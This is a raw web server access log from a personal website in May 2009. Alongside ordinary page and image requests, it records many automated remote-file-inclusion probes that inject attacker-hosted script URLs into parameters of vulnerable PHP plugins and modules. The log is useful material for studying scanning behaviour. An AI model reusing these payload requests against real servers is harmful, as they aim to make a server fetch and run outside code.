70.137.94.18 - - [22/May/2009:09:15:34 -0700] "GET /minamijewelry/html/images/bird_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/testimonials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:34 -0700] "GET /minamijewelry/html/images/bird_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/testimonials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:34 -0700] "GET /minamijewelry/html/images/wind_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/testimonials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:34 -0700] "GET /minamijewelry/html/images/wind_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/testimonials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:35 -0700] "GET /minamijewelry/html/images/moon_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/testimonials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:35 -0700] "GET /minamijewelry/html/images/dream_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/testimonials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:37 -0700] "GET /minamijewelry/html/images/moon_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/testimonials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:38 -0700] "GET /minamijewelry/html/about.html HTTP/1.1" 200 12858 "http://www.dmulk.com/minamijewelry/html/testimonials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:40 -0700] "GET /minamijewelry/html/images/flower_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:40 -0700] "GET /minamijewelry/html/images/flower_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:43 -0700] "GET /minamijewelry/html/images/bird_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:43 -0700] "GET /minamijewelry/html/images/bird_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:43 -0700] "GET /minamijewelry/html/images/wind_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
64.157.4.42 - - [22/May/2009:09:15:44 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:46 -0700] "GET /minamijewelry/html/contact.html HTTP/1.1" 200 12369 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:46 -0700] "GET /minamijewelry/html/images/wind_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
79.181.127.244 - - [22/May/2009:09:15:47 -0700] "GET /logs/access_081005.log HTTP/1.0" 200 786432 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)" "www.dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:47 -0700] "GET /minamijewelry/html/images/flower_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:47 -0700] "GET /minamijewelry/html/images/bird_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:47 -0700] "GET /minamijewelry/html/images/wind_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:47 -0700] "GET /minamijewelry/html/images/moon_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:48 -0700] "GET /minamijewelry/html/image/bg_color.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:48 -0700] "GET /minamijewelry/html/images/flower_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:48 -0700] "GET /minamijewelry/html/images/wind_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:48 -0700] "GET /minamijewelry/html/images/bird_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:48 -0700] "GET /minamijewelry/html/images/moon_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:48 -0700] "GET /minamijewelry/html/images/dream_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:48 -0700] "GET /minamijewelry/html/images/dream_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:49 -0700] "GET /minamijewelry/html/terms.html HTTP/1.1" 200 13533 "http://www.dmulk.com/minamijewelry/html/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:50 -0700] "GET /minamijewelry/html/images/flower_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/terms.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:50 -0700] "GET /minamijewelry/html/images/flower_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/terms.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:50 -0700] "GET /minamijewelry/html/images/bird_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/terms.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:50 -0700] "GET /minamijewelry/html/images/wind_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/terms.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:50 -0700] "GET /minamijewelry/html/images/wind_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/terms.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:53 -0700] "GET /minamijewelry/html/images/bird_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/terms.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:53 -0700] "GET /minamijewelry/html/images/moon_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/terms.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:53 -0700] "GET /minamijewelry/html/images/dream_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/terms.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:56 -0700] "GET /minamijewelry/html/images/moon_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/terms.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:56 -0700] "GET /minamijewelry/html/images/dream_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/terms.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:15:57 -0700] "GET /minamijewelry/html/image/bg_color.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/terms.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
69.90.72.88 - - [22/May/2009:09:16:01 -0700] "GET /index.php?opcao=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 500 292 "-" "libwww-perl/5.805" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:16:07 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:16:07 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:16:09 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:16:09 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:16:09 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:16:10 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.151.134.36 - - [22/May/2009:09:16:14 -0700] "GET /logs/access_080412.log/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [22/May/2009:09:16:15 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
216.151.134.36 - - [22/May/2009:09:16:16 -0700] "GET /logs/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 200 100620 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [22/May/2009:09:16:16 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:09:16:18 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:09:16:18 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
216.151.134.36 - - [22/May/2009:09:16:20 -0700] "GET /logs/access_090223.log/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:16:20 -0700] "GET /logs/access_080315.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:16:20 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:16:20 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.251.81.216 - - [22/May/2009:09:16:21 -0700] "GET /logs/access_080515.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:16:21 -0700] "GET /logs/access_080808.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:16:22 -0700] "GET /logs/access_080315.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.251.81.216 - - [22/May/2009:09:16:24 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.251.81.216 - - [22/May/2009:09:16:24 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.134.110.45 - - [22/May/2009:09:16:25 -0700] "GET /avatar.php?page=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.134.110.45 - - [22/May/2009:09:16:25 -0700] "GET /logs/avatar.php?page=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.134.110.45 - - [22/May/2009:09:16:25 -0700] "GET /logs/access_080501.log/avatar.php?page=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.134.110.45 - - [22/May/2009:09:16:25 -0700] "GET /logs/access_080828.log/avatar.php?page=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:16:25 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:16:25 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.134.110.45 - - [22/May/2009:09:16:26 -0700] "GET /logs/access_080501.log%20%20/avatar.php?page=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:16:33 -0700] "GET /logs/access_090117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [22/May/2009:09:16:33 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:16:38 -0700] "GET /logs/access_090117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:16:40 -0700] "GET /logs/access_081010.log/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:16:41 -0700] "GET /errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.72.88 - - [22/May/2009:09:16:41 -0700] "GET /index.php?meio=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 200 41927 "-" "libwww-perl/5.805" "www.dmulk.com"
203.251.81.216 - - [22/May/2009:09:16:43 -0700] "GET /logs/access_081027.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.212.165.114 - - [22/May/2009:09:16:43 -0700] "GET /logs/access_080720.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.212.165.114 - - [22/May/2009:09:16:44 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.212.165.114 - - [22/May/2009:09:16:48 -0700] "GET /logs/access_080720.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.212.165.114 - - [22/May/2009:09:16:52 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:16:53 -0700] "GET /logs/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.194.189 - - [22/May/2009:09:16:53 -0700] "GET /logs/access_080918.log//classes/core/language.php?rootdir=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.194.189 - - [22/May/2009:09:16:53 -0700] "GET /classes/core/language.php?rootdir=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.165.114 - - [22/May/2009:09:16:55 -0700] "GET /logs/access_090217.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.149.194.189 - - [22/May/2009:09:16:57 -0700] "GET /logs//classes/core/language.php?rootdir=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:17:00 -0700] "GET /logs/access_090313.log/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.151.134.36 - - [22/May/2009:09:17:00 -0700] "GET /?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
208.38.181.51 - - [22/May/2009:09:17:33 -0700] "GET /slice.php3?GLOBALS[AA_INC_PATH]=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.38.181.51 - - [22/May/2009:09:17:36 -0700] "GET /logs/slice.php3?GLOBALS[AA_INC_PATH]=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.38.181.51 - - [22/May/2009:09:17:41 -0700] "GET /logs/access_090221.log/slice.php3?GLOBALS[AA_INC_PATH]=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.38.181.51 - - [22/May/2009:09:17:41 -0700] "GET /logs/slice.php3?GLOBALS[AA_INC_PATH]=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.38.181.51 - - [22/May/2009:09:17:41 -0700] "GET /slice.php3?GLOBALS[AA_INC_PATH]=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:17:47 -0700] "GET /logs/access_090221.log%20%20/slice.php3?GLOBALS[AA_INC_PATH]=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:17:47 -0700] "GET /logs/slice.php3?GLOBALS[AA_INC_PATH]=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:17:47 -0700] "GET /logs/access_090308.log%20%20/slice.php3?GLOBALS[AA_INC_PATH]=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:17:49 -0700] "GET /logs/access_080514.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:17:50 -0700] "GET /slice.php3?GLOBALS[AA_INC_PATH]=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:17:54 -0700] "GET /logs/access_090308.log/slice.php3?GLOBALS[AA_INC_PATH]=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:17:57 -0700] "GET /logs/access_090221.log/slice.php3?GLOBALS[AA_INC_PATH]=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.151.134.36 - - [22/May/2009:09:18:13 -0700] "GET /logs/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 200 100620 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [22/May/2009:09:18:13 -0700] "GET /logs/access_080515.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [22/May/2009:09:18:15 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
216.151.134.36 - - [22/May/2009:09:18:21 -0700] "GET /logs/access_080412.log/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.151.134.36 - - [22/May/2009:09:18:21 -0700] "GET /logs/access_090223.log/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:18:26 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:18:26 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
